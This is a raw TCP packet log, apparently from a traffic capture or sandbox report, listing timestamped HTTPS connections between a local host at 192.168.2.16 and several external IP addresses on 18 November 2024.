                                                                                                                                                                                            Nov 18, 2024 21:00:14.732398987 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.732445955 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.780428886 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857495070 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857552052 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857589960 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857626915 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857644081 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857697010 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857737064 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857758999 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857798100 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857848883 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857856989 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857871056 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857913971 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857930899 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.857984066 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.888703108 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.890959978 CET49849443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:14.891027927 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.892267942 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.895212889 CET49849443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:14.895345926 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.897025108 CET49849443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:14.904542923 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.908174038 CET49850443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:14.908235073 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.909507036 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.911608934 CET49850443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:14.911802053 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.913697004 CET49850443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:14.939336061 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.955343008 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980104923 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980246067 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980283976 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980307102 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980326891 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980393887 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980438948 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980474949 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980525017 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980539083 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980681896 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980737925 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980751991 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980845928 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980920076 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.980932951 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981805086 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981837988 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981867075 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981869936 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981885910 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981944084 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.981956959 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982002020 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982012033 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982024908 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982064962 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982073069 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982086897 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982137918 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:14.982151031 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.016212940 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.016601086 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.016642094 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.018129110 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.018228054 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.019654989 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.019751072 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.019923925 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.022061110 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.023310900 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.023350000 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.024251938 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.024318933 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.025851965 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.025917053 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.026051044 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.026066065 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.034394026 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.063343048 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.066394091 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.066410065 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.066406965 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.088054895 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.088213921 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.088983059 CET49849443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.089579105 CET49849443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.089591980 CET4434984966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.092283010 CET49711443192.168.2.16172.217.16.132
                                                                                                                                                                                            Nov 18, 2024 21:00:15.092307091 CET44349711172.217.16.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.092675924 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.092725039 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.092931032 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.093211889 CET49853443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.093230009 CET4434985366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.099766016 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.099863052 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.099956989 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.099997997 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100028038 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100035906 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100035906 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100087881 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100157022 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100189924 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100358963 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100413084 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.100435019 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.101305008 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.101377964 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.101392984 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102124929 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102190971 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102193117 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102205038 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102247000 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102255106 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102268934 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.102299929 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.103081942 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.103218079 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.103230953 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.103307009 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.103874922 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.103943110 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104018927 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104079008 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104856014 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104893923 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104926109 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104943037 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.104967117 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.105000973 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.105556965 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.105623007 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.105767965 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.105834961 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108052969 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108072042 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108129978 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108154058 CET49850443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108223915 CET49850443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108845949 CET49850443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.108887911 CET4434985066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.111815929 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.111849070 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.111926079 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.112215042 CET49854443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:15.112229109 CET4434985466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.114432096 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.146739960 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                            Nov 18, 2024 21:00:15.178395033 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                            Nov 18, 2024 21:00:15.218228102 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.218310118 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.218405962 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.218473911 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.218719959 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.218782902 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.219443083 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.219501019 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.219513893 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.219543934 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.219549894 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.219947100 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220004082 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220019102 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220068932 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220068932 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220082998 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220124006 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220138073 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220190048 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220202923 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220254898 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220323086 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.220377922 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221038103 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221096992 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221101046 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221113920 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221148014 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221899986 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221961975 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.221976042 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222028017 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222029924 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222040892 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222079992 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222120047 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222166061 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222178936 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.222229004 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.224890947 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.224956989 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225056887 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225116014 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225152969 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225207090 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225271940 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225325108 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225392103 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225444078 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225450039 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225461960 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225487947 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225507021 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225590944 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225647926 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225650072 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225660086 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225694895 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225717068 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225791931 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.225841999 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.226470947 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.226524115 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.226583958 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.226638079 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.226669073 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.226732016 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.227889061 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.227972031 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.227992058 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.228046894 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289087057 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289153099 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289189100 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289202929 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289237976 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289280891 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289287090 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289298058 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289355040 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.289361000 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.290734053 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.290775061 CET44349847142.250.186.162192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.290822983 CET49847443192.168.2.16142.250.186.162
                                                                                                                                                                                            Nov 18, 2024 21:00:15.291352034 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.294137001 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:15.294183016 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.294239998 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:15.295186996 CET49855443192.168.2.16142.250.185.194
                                                                                                                                                                                            Nov 18, 2024 21:00:15.295197964 CET44349855142.250.185.194192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.298746109 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:15.298782110 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.298841953 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:15.299139977 CET49856443192.168.2.16142.250.185.164
                                                                                                                                                                                            Nov 18, 2024 21:00:15.299149990 CET44349856142.250.185.164192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.336467028 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.336498976 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.336817026 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.336899042 CET44349848142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.336956024 CET49848443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338313103 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338392019 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338536024 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338546991 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338581085 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338620901 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338660002 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338690042 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338733912 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338962078 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.338984013 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339044094 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339061022 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339116096 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339416027 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339437008 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339484930 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339497089 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339523077 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.339540005 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343439102 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343461037 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343508005 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343523979 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343547106 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343568087 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343777895 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343799114 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343843937 CET49846443192.168.2.16188.114.96.3
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343857050 CET44349846188.114.96.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:15.343882084 CET49846443192.168.2.16188.114.96.3
